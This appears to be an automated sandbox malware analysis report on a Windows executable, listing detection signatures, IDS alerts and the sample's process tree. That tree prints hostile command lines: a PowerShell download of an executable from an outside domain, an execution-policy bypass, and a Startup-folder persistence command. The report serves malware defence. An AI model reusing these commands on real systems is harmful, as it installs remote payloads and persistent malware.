Edit tour
Windows
Analysis Report
TCKxnQ5CPn.exe
Overview
General Information
| Sample name: | TCKxnQ5CPn.exerenamed because original name is a hash value |
| Original sample name: | 2a89603d2620b2a62113513709e38e95.exe |
| Analysis ID: | 1581402 |
| MD5: | 2a89603d2620b2a62113513709e38e95 |
| SHA1: | e82753848fbd2e4c993661a80ad11cca2fa73b77 |
| SHA256: | b52b0e15bcdc6b45a70fbf908381b1385b1a84bf6eb2bcfc35cb684b774021f7 |
| Tags: | exeuser-abuse_ch |
| Infos: |  |
 | |
Detection
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Bypasses PowerShell execution policy
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Powershell drops PE file
Sigma detected: Execution from Suspicious Folder
Sigma detected: Execution of Powershell Script in Public Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
TCKxnQ5CPn.exe (PID: 2748 cmdline: "C:\Users\ user\Deskt op\TCKxnQ5 CPn.exe" MD5: 2A89603D2620B2A62113513709E38E95) 
powershell.exe (PID: 1004 cmdline: powershell -Command "Invoke-We bRequest - Uri "https ://tiffany -careers.c om/ALGglt" -OutFile "C:\Users\ Public\Gua rd.exe"" MD5: 04029E121A0CFA5991749937DD22A1D9) 
conhost.exe (PID: 5680 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6848 cmdline:
powershell .exe -Exec utionPolic y Bypass - File "C:\U sers\Publi c\PublicPr ofile.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 2804 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
Guard.exe (PID: 2988 cmdline: "C:\Users\ Public\Gua rd.exe" C: \Users\Pub lic\Secure .au3 MD5: 18CE19B57F43CE0A5AF149C96AECC685) - cmd.exe (PID: 5652 cmdline:
cmd /k ech o [Interne tShortcut] > "C:\Use rs\user\Ap pData\Roam ing\Micros oft\Window s\Start Me nu\Program s\Startup\ SwiftWrite .url" & ec ho URL="C: \Users\use r\AppData\ Local\Word Genius Tec hnologies\ SwiftWrite .js" >> "C :\Users\us er\AppData \Roaming\M icrosoft\W indows\Sta rt Menu\Pr ograms\Sta rtup\Swift Write.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 1096 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
wscript.exe (PID: 5048 cmdline: "C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Loc al\WordGen ius Techno logies\Swi ftWrite.js " MD5: A47CBE969EA935BDD3AB568BB126BC80) - SwiftWrite.pif (PID: 6832 cmdline:
"C:\Users\ user\AppDa ta\Local\W ordGenius Technologi es\SwiftWr ite.pif" " C:\Users\u ser\AppDat a\Local\Wo rdGenius T echnologie s\G" MD5: 18CE19B57F43CE0A5AF149C96AECC685)
- cleanup
⊘No configs have been found
⊘No yara matches
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems), Tim Shelton: | ||
| Source: | Author: Max Altgelt (Nextron Systems): | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): | ||
| Source: | Author: Nasreddine Bencherchali (Nextron Systems): | ||
| Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: frack113: | ||
| Source: | Author: Max Altgelt (Nextron Systems): | ||
| Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: | ||
| Source: | Author: Michael Haag: | ||
| Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): | ||
Data Obfuscation | |
|---|
| Source: | Author: Joe Security: | ||
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-12-27T15:00:50.391754+0100 | 1810003 | 2 | Potentially Bad Traffic | 147.45.49.155 | 443 | 192.168.2.9 | 49707 | TCP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-12-27T15:00:50.134198+0100 | 1810000 | 1 | Potentially Bad Traffic | 192.168.2.9 | 49707 | 147.45.49.155 | 443 | TCP |
Click to jump to signature section
Show All Signature Results
AV Detection | |
|---|
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | ReversingLabs: | ||
| Source: | Integrated Neural Analysis Model: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | Static PE information: | ||
| Source: | Code function: | 0_2_00007FF69DBAC7C0 | |
| Source: | Code function: | 0_2_00007FF69DBABC70 | |
| Source: | Code function: | 0_2_00007FF69DBAB7C0 | |
| Source: | Code function: | 0_2_00007FF69DBB72A8 | |
| Source: | Code function: | 0_2_00007FF69DBB71F4 | |
| Source: | Code function: | 0_2_00007FF69DB72F50 | |
| Source: | Code function: | 0_2_00007FF69DBBA874 | |
| Source: | Code function: | 0_2_00007FF69DBBA4F8 | |
| Source: | Code function: | 0_2_00007FF69DBB6428 | |
| Source: | Code function: | 0_2_00007FF69DBBA350 | |
| Source: | Code function: | 6_2_00194005 | |
| Source: | Code function: | 6_2_0019494A | |
| Source: | Code function: | 6_2_0019C2FF | |
| Source: | Code function: | 6_2_0019CD14 | |
| Source: | Code function: | 6_2_0019CD9F | |
| Source: | Code function: | 6_2_0019F5D8 | |
| Source: | Code function: | 6_2_0019F735 | |
| Source: | Code function: | 6_2_0019FA36 | |
| Source: | Code function: | 6_2_00193CE2 | |
| Source: | Code function: | 13_2_00924005 | |
| Source: | Code function: | 13_2_0092494A | |
| Source: | Code function: | 13_2_0092C2FF | |
| Source: | Code function: | 13_2_0092CD9F | |
| Source: | Code function: | 13_2_0092CD14 | |
| Source: | Code function: | 13_2_0092F5D8 | |
| Source: | Code function: | 13_2_0092F735 | |
| Source: | Code function: | 13_2_0092FA36 | |
| Source: | Code function: | 13_2_00923CE2 | |
Networking | |
|---|
| Source: | Suricata IDS: | ||
| Source: | HTTP traffic detected: | ||
| Source: | IP Address: | ||
| Source: | JA3 fingerprint: | ||
| Source: | Suricata IDS: | ||
| Source: | HTTP traffic detected: | ||
| Source: | UDP traffic detected without corresponding DNS query: | ||
| Source: | UDP traffic detected without corresponding DNS query: | ||
| Source: | UDP traffic detected without corresponding DNS query: | ||
| Source: | Code function: | 0_2_00007FF69DBBE968 | |
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | DNS traffic detected: | ||
| Source: | DNS traffic detected: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | Code function: | 0_2_00007FF69DBC0A6C | |
| Source: | Code function: | 0_2_00007FF69DBC0D24 | |
| Source: | Code function: | 6_2_001A4830 | |
| Source: | Code function: | 13_2_00934830 | |
| Source: | Code function: | 0_2_00007FF69DBC0A6C | |
| Source: | Code function: | 0_2_00007FF69DBA7E64 | |
| Source: | Code function: | 6_2_001BD164 | |
| Source: | Code function: | 13_2_0094D164 | |
System Summary | |
|---|
| Source: | Code function: | 0_2_00007FF69DB337B0 | |
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | memstr_23354ca7-0 | |
| Source: | String found in binary or memory: | memstr_93d891fa-5 | |
| Source: | String found in binary or memory: | memstr_9a5e8ced-9 | |
| Source: | String found in binary or memory: | memstr_5972f5ef-7 | |
| Source: | File created: | Jump to dropped file | ||
| Source: | COM Object queried: | Jump to behavior | ||
| Source: | Code function: | 0_2_00007FF69DBB3E20 | |
| Source: | Code function: | 0_2_00007FF69DB9D2C4 | |
| Source: | Code function: | 0_2_00007FF69DBAD750 | |
| Source: | Code function: | 6_2_00195778 | |
| Source: | Code function: | 13_2_00925778 | |
| Source: | Code function: | 0_2_00007FF69DBCF630 | |
| Source: | Code function: | 0_2_00007FF69DB5BEB4 | |
| Source: | Code function: | 0_2_00007FF69DB3BE70 | |
| Source: | Code function: | 0_2_00007FF69DB5C130 | |
| Source: | Code function: | 0_2_00007FF69DBC206C | |
| Source: | Code function: | 0_2_00007FF69DB35F3C | |
| Source: | Code function: | 0_2_00007FF69DBDDB18 | |
| Source: | Code function: | 0_2_00007FF69DB4FA4F | |
| Source: | Code function: | 0_2_00007FF69DBDBA0C | |
| Source: | Code function: | 0_2_00007FF69DBB1A18 | |
| Source: | Code function: | 0_2_00007FF69DB3B9F0 | |
| Source: | Code function: | 0_2_00007FF69DB6793C | |
| Source: | Code function: | 0_2_00007FF69DB43C20 | |
| Source: | Code function: | 0_2_00007FF69DBC56A0 | |
| Source: | Code function: | 0_2_00007FF69DB695B0 | |
| Source: | Code function: | 0_2_00007FF69DB458D0 | |
| Source: | Code function: | 0_2_00007FF69DB5F8D0 | |
| Source: | Code function: | 0_2_00007FF69DBAD87C | |
| Source: | Code function: | 0_2_00007FF69DB3183C | |
| Source: | Code function: | 0_2_00007FF69DB71840 | |
| Source: | Code function: | 0_2_00007FF69DBE17C0 | |
| Source: | Code function: | 0_2_00007FF69DB61750 | |
| Source: | Code function: | 0_2_00007FF69DB7529C | |
| Source: | Code function: | 0_2_00007FF69DBC32AC | |
| Source: | Code function: | 0_2_00007FF69DB3B390 | |
| Source: | Code function: | 0_2_00007FF69DBDCE8C | |
| Source: | Code function: | 0_2_00007FF69DB50E90 | |
| Source: | Code function: | 0_2_00007FF69DB40E70 | |
| Source: | Code function: | 0_2_00007FF69DB42E30 | |
| Source: | Code function: | 0_2_00007FF69DB76DE4 | |
| Source: | Code function: | 0_2_00007FF69DB630DC | |
| Source: | Code function: | 0_2_00007FF69DB32AE0 | |
| Source: | Code function: | 0_2_00007FF69DBD0AEC | |
| Source: | Code function: | 0_2_00007FF69DB72D20 | |
| Source: | Code function: | 0_2_00007FF69DBC6C34 | |
| Source: | Code function: | 0_2_00007FF69DBDC6D4 | |
| Source: | Code function: | 0_2_00007FF69DBDA59C | |
| Source: | Code function: | 0_2_00007FF69DBD055C | |
| Source: | Code function: | 0_2_00007FF69DB6A8A0 | |
| Source: | Code function: | 0_2_00007FF69DB767F0 | |
| Source: | Code function: | 0_2_00007FF69DBC6320 | |
| Source: | Code function: | 0_2_00007FF69DB502C4 | |
| Source: | Code function: | 0_2_00007FF69DB54514 | |
| Source: | Code function: | 0_2_00007FF69DB684C0 | |
| Source: | Code function: | 0_2_00007FF69DB5C3FC | |
| Source: | Code function: | 0_2_00007FF69DB72400 | |
| Source: | Code function: | 0_2_00007FF69DBB83D4 | |
| Source: | Code function: | 0_2_00007FF69DBC8360 | |
| Source: | Code function: | 4_2_00007FF887BB245D | |
| Source: | Code function: | 6_2_0013B020 | |
| Source: | Code function: | 6_2_001394E0 | |
| Source: | Code function: | 6_2_00139C80 | |
| Source: | Code function: | 6_2_001523F5 | |
| Source: | Code function: | 6_2_001B8400 | |
| Source: | Code function: | 6_2_00166502 | |
| Source: | Code function: | 6_2_0016265E | |
| Source: | Code function: | 6_2_0013E6F0 | |
| Source: | Code function: | 6_2_0015282A | |
| Source: | Code function: | 6_2_001689BF | |
| Source: | Code function: | 6_2_001B0A3A | |
| Source: | Code function: | 6_2_00166A74 | |
| Source: | Code function: | 6_2_00140BE0 | |
| Source: | Code function: | 6_2_0015CD51 | |
| Source: | Code function: | 6_2_0018EDB2 | |
| Source: | Code function: | 6_2_00198E44 | |
| Source: | Code function: | 6_2_001B0EB7 | |
| Source: | Code function: | 6_2_00166FE6 | |
| Source: | Code function: | 6_2_001533B7 | |
| Source: | Code function: | 6_2_0015F409 | |
| Source: | Code function: | 6_2_0014D45D | |
| Source: | Code function: | 6_2_0014F628 | |
| Source: | Code function: | 6_2_00131663 | |
| Source: | Code function: | 6_2_001516B4 | |
| Source: | Code function: | 6_2_0013F6A0 | |
| Source: | Code function: | 6_2_001578C3 | |
| Source: | Code function: | 6_2_0015DBA5 | |
| Source: | Code function: | 6_2_00151BA8 | |
| Source: | Code function: | 6_2_00169CE5 | |
| Source: | Code function: | 6_2_0014DD28 | |
| Source: | Code function: | 6_2_0015BFD6 | |
| Source: | Code function: | 6_2_00151FC0 | |
| Source: | Code function: | 13_2_008CB020 | |
| Source: | Code function: | 13_2_008C94E0 | |
| Source: | Code function: | 13_2_008C9C80 | |
| Source: | Code function: | 13_2_008E23F5 | |
| Source: | Code function: | 13_2_00948400 | |
| Source: | Code function: | 13_2_008F6502 | |
| Source: | Code function: | 13_2_008CE6F0 | |
| Source: | Code function: | 13_2_008F265E | |
| Source: | Code function: | 13_2_008E282A | |
| Source: | Code function: | 13_2_008F89BF | |
| Source: | Code function: | 13_2_00940A3A | |
| Source: | Code function: | 13_2_008F6A74 | |
| Source: | Code function: | 13_2_008D0BE0 | |
| Source: | Code function: | 13_2_0091EDB2 | |
| Source: | Code function: | 13_2_008ECD51 | |
| Source: | Code function: | 13_2_00940EB7 | |
| Source: | Code function: | 13_2_00928E44 | |
| Source: | Code function: | 13_2_008F6FE6 | |
| Source: | Code function: | 13_2_008E33B7 | |
| Source: | Code function: | 13_2_008EF409 | |
| Source: | Code function: | 13_2_008DD45D | |
| Source: | Code function: | 13_2_008CF6A0 | |
| Source: | Code function: | 13_2_008E16B4 | |
| Source: | Code function: | 13_2_008DF628 | |
| Source: | Code function: | 13_2_008C1663 | |
| Source: | Code function: | 13_2_008E78C3 | |
| Source: | Code function: | 13_2_008E1BA8 | |
| Source: | Code function: | 13_2_008EDBA5 | |
| Source: | Code function: | 13_2_008F9CE5 | |
| Source: | Code function: | 13_2_008DDD28 | |
| Source: | Code function: | 13_2_008E1FC0 | |
| Source: | Code function: | 13_2_008EBFD6 | |
| Source: | Dropped File: | ||
| Source: | Classification label: | ||
| Source: | Code function: | 0_2_00007FF69DBB3778 | |
| Source: | Code function: | 0_2_00007FF69DB9D5CC | |
| Source: | Code function: | 0_2_00007FF69DB9CCE0 | |
| Source: | Code function: | 6_2_00188DE9 | |
| Source: | Code function: | 6_2_00189399 | |
| Source: | Code function: | 13_2_00918DE9 | |
| Source: | Code function: | 13_2_00919399 | |
| Source: | Code function: | 0_2_00007FF69DBB59D8 | |
| Source: | Code function: | 0_2_00007FF69DBABE00 | |
| Source: | Code function: | 0_2_00007FF69DBB5F2C | |
| Source: | Code function: | 0_2_00007FF69DB36580 | |
| Source: | File created: | Jump to behavior | ||
| Source: | Mutant created: | ||
| Source: | Mutant created: | ||
| Source: | Mutant created: | ||
| Source: | Mutant created: | ||
| Source: | File created: | Jump to behavior | ||
| Source: | Static PE information: | ||
| Source: | File read: | Jump to behavior | ||
| Source: | Key opened: | Jump to behavior | ||
| Source: | ReversingLabs: | ||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Key value queried: | Jump to behavior | ||
| Source: | Window detected: | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | Static PE information: | ||
| Source: | Static file information: | ||
| Source: | Static PE information: | ||
| Source: | Static PE information: | ||
| Source: | Static PE information: | ||
| Source: | Static PE information: | ||
| Source: | Static PE information: | ||
| Source: | Static PE information: | ||
| Source: | Static PE information: | ||
| Source: | Static PE information: | ||
| Source: | Static PE information: | ||
| Source: | Static PE information: | ||
| Source: | Static PE information: | ||
| Source: | Static PE information: | ||
| Source: | Static PE information: | ||
Data Obfuscation | |
|---|
| Source: | Process created: | |||
| Source: | Process created: | Jump to behavior | ||
| Source: | Code function: | 0_2_00007FF69DBC7634 | |
| Source: | Code function: | 0_2_00007FF69DB67904 | |
| Source: | Code function: | 0_2_00007FF69DB673A2 | |
| Source: | Code function: | 4_2_00007FF887BB19E1 | |
| Source: | Code function: | 6_2_00158B88 | |
| Source: | Code function: | 6_2_0014CBF8 | |
| Source: | Code function: | 13_2_008E8B88 | |
Persistence and Installation Behavior | |
|---|
| Source: | File created: | Jump to dropped file | ||
| Source: | File created: | Jump to dropped file | ||
| Source: | File created: | Jump to dropped file | ||
| Source: | File created: | Jump to dropped file | ||
Boot Survival | |
|---|
| Source: | File created: | Jump to dropped file | ||
| Source: | File created: | Jump to behavior | ||
| Source: | File created: | Jump to behavior | ||
Hooking and other Techniques for Hiding and Protection | |
|---|
| Source: | Icon embedded in binary file: | ||
| Source: | Code function: | 0_2_00007FF69DB54514 | |
| Source: | Code function: | 6_2_001B59B3 | |
| Source: | Code function: | 6_2_00145EDA | |
| Source: | Code function: | 13_2_009459B3 | |
| Source: | Code function: | 13_2_008D5EDA | |
| Source: | Code function: | 6_2_001533B7 | |
| Source: | Process information set: | Jump to behavior | ||
